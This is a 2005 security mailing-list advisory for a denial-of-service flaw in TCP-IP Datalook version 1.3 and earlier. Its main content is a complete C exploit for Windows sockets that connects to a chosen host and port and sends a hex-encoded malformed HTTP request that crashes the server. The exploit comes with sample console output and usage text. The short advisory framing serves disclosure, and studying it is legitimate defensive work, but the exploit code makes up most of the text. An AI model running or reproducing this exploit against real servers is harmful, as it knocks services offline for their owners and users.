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| Subject: | [EXPL] TCP-IP Datalook DoS Vulnerability (Exploit) |
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| Date: | 27 Jun 2005 12:06:13 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - TCP-IP Datalook DoS Vulnerability (Exploit) ------------------------------------------------------------------------ SUMMARY <http://www.pscode.com/vb/scripts/ShowCode.asp?txtCodeId=25071&lngWId=1> TCP-IP Datalook is "a program that can be used to view the data transfered between Client application and Server application". By sending a special crafted request to the listening port of the TCP-IP Datalook server its possible to cause the server to stop crash. DETAILS Vulnerable Systems: * IP-DATALOOK version 1.3 and prior Exploit: /* IP-DATALOOK Local DoS Exploit --------------------------------- INFGP - Hacking&security Research Resolve host...[OK] [+] Connecting...[OK] Target locked Sending bad procedure...[OK] [*] Server Disconnected! Tested on Windows2000 SP4 Infos: infamous.2hell.com / basher13 at linuxmail.org */ #include string.h #include winsock2.h #include stdio.h #pragma comment(lib, "ws2_32.lib") char doscore[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "\x3f\x3f\x3f\x3f\x3f\x2e\x48\x54\x4d\x4c\x3f\x74\x65\x73\x74\x76" "\x61\x72\x69\x61\x62\x6c\x65\x3d\x26\x6e\x65\x78\x74\x74\x65\x73" "\x74\x76\x61\x72\x69\x61\x62\x6c\x65\x3d\x67\x69\x66\x20\x48\x54" "\x54\x50\x2f\x31\x2e\x31\x0a\x52\x65\x66\x65\x72\x65\x72\x3a\x20" "\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74" "\x2f\x62\x6f\x62\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70" "\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78" "\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63" "\x6f\x64\x65\x64\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a" "\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0a\x43\x6f\x6f\x6b" "\x69\x65\x3a\x20\x56\x41\x52\x49\x41\x42\x4c\x45\x3d\x53\x45\x43" "\x55\x52\x49\x54\x59\x2d\x50\x52\x4f\x54\x4f\x43\x4f\x4c\x53\x3b" "\x20\x70\x61\x74\x68\x3d\x2f\x0a\x55\x73\x65\x72\x2d\x41\x67\x65" "\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37\x36" "\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20\x4c" "\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36\x38" "\x36\x29\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72\x65\x73" "\x75\x6c\x74\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68" "\x6f\x73\x74\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67" "\x74\x68\x3a\x20\x20\x20\x20\x20\x35\x31\x33\x0a\x41\x63\x63\x65" "\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69" "\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20" "\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67" "\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f\x70" "\x6e\x67\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69" "\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0a\x41\x63\x63\x65\x70\x74\x2d" "\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x65\x6e\x0a\x41\x63\x63" "\x65\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f" "\x2d\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0a" "\x0a\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x41" "\x69\x6d\x61\x67\x65\r\n"; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET inetdos; if (argc < 2) { printf(" \n", argv[0]); printf(" IP-DATALOOK Local DoS Exploit \n", argv[0]); printf(" -------------------------------------\n", argv[0]); printf(" INFGP - Hacking&Security Research\n\n", argv[0]); printf("[-]Usage: %s [target] [port]\n", argv[0]); printf("[?]Exam: localhost 80\n", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 80; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); inetdos = socket(AF_INET, SOCK_STREAM, 0); if(inetdos==INVALID_SOCKET) { printf("Socket ERROR \n"); exit(1); } printf("Resolve host... "); if ((pTarget = gethostbyname(target)) == NULL) { printf("FAILED \n", argv[0]); exit(1); } printf("[OK]\n "); memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("[+] Connecting... "); if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("FAILED\n"); exit(1); } printf("[OK]\n"); printf("Target locked\n"); printf("Sending bad procedure... "); if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) { printf("ERROR\n"); closesocket(inetdos); exit(1); } printf("[OK]\n "); printf("[+] Server Disconnected!\n"); closesocket(inetdos); WSACleanup(); return 0; } ADDITIONAL INFORMATION The information has been provided by <mailto:basher13@linuxmail.org> basher13. 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